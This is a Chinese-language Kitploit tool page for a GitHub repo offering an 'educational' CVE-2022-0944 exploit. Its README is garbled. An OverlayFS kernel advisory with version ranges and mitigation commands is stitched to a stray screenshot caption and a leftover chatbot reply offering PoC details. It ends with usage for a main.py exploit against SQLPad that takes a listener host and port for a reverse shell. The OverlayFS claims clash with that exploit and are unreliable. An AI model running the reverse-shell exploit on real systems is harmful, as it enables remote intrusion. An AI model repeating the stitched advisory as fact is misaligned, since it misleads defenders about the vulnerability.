Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
OverlayFS-PrivEsc-CVE-2022-0944 — 教育性漏洞利用,针对 CVE-2022-0944 OverlayFS 权限提升,包含反向 Shell 载荷投递与内核版本检测脚本。 | Kitploit
工具/GitHubGitHub/neoartemis37/overlayfs-privesc-cve-2022-0944
权限提升漏洞分析漏洞利用学习与教育
GitHubneoartemis37/overlayfs-privesc-cve-2022-0944

OverlayFS-PrivEsc-CVE-2022-0944

教育性漏洞利用,针对 CVE-2022-0944 OverlayFS 权限提升,包含反向 Shell 载荷投递与内核版本检测脚本。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
444个月前尚未审核

CVE-2022-0944:OverlayFS 权限提升漏洞 🛡️

CVE Severity

关于 Linux 内核 OverlayFS 权限提升漏洞的安全公告与缓解指南。

概述

CVE-2022-0944 是 Linux 内核 OverlayFS 子系统中的一个安全漏洞,该漏洞源于特定配置下对文件创建的不当处理,使本地攻击者能够提升权限。

技术细节

截图 2025-03-26 17-15-46 我为 Java 初学者发布了一门课程,但不幸的是我没有用于指引的 README 文件

🚨 影响

本地攻击者可能能够:

root@kitploit:~
通过精心构造的文件操作获取 root 权限
绕过安全限制
修改敏感的系统文件
破坏整个系统完整性

🔍 检测

  1. 检查内核版本 uname -r

Affected versions: 5.8 <= kernel < 5.16.12

  1. 验证 OverlayFS 使用情况 mount | grep overlay

Systems using OverlayFS mounts are at risk

  1. 检查安全公告

For Debian/Ubuntu:

root@kitploit:~
grep CVE-2022-0944 /var/log/apt/history.log

# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944

4.🛡️ 缓解措施

官方补丁

请升级到以下已修复版本之一:

root@kitploit:~
Linux 内核 5.16.12 或更高版本
各厂商移植(backport)的补丁

更新命令:

Ubuntu/Debian

sudo apt update && sudo apt upgrade linux-image-$(uname -r)

RHEL/CentOS

sudo yum update kernel

临时解决方案(若无法立即修补)

root@kitploit:~
限制 OverlayFS 的使用:
  sudo modprobe -r overlay

实施命名空间限制:
# Create unprivileged user namespace unshare -Ur

root@kitploit:~
    # Mount with user restrictions
    mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt

应用 SELinux/AppArmor 策略: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }

⚠️ 免责声明 本文档仅供参考。尽管已尽力确保准确性, 但不提供任何保证。在生产环境部署之前,请务必先在开发环境中测试补丁。

最后更新:2023-10-01 | 查看变更日志

主要特点:

  1. 通过安全徽章进行清晰的漏洞分级
  2. 快速查阅的技术细节表格
  3. 可操作的检测与缓解步骤
  4. 各厂商专用的更新命令
  5. 安全策略示例(SELinux/AppArmor)
  6. 官方参考链接
  7. 符合漏洞披露标准

此 README 格式适用于:

  • 安全团队
  • 系统管理员
  • DevOps 工程师
  • 开源维护者
  • 漏洞数据库

您是否需要我:

  1. 添加具体的厂商补丁信息?
  2. 加入漏洞利用的概念验证(PoC)细节(请谨慎使用)?
  3. 添加更多检测脚本?
  4. 针对特定 Linux 发行版进行定制?

使用方法

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL to SQLPad
  lhost       Listener host address for reverse shell
  lport       Listener port for reverse shell
  username    login username (optional)
  password    login password (optional)

options:
  -h, --help  show this help message and exit

示例:

root@kitploit:~
# install requirements
pip install -r requirements.txt

# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

免责声明

本仓库所包含的代码和工具仅供教育目的使用,专门用于网络安全课程和学习环境。本代码作者对因使用、误用或修改本代码而产生的任何后果概不承担任何责任。本代码按“原样”提供,不附带任何明示或暗示的担保,包括但不限于对适销性或特定用途适用性的暗示担保。

下载工具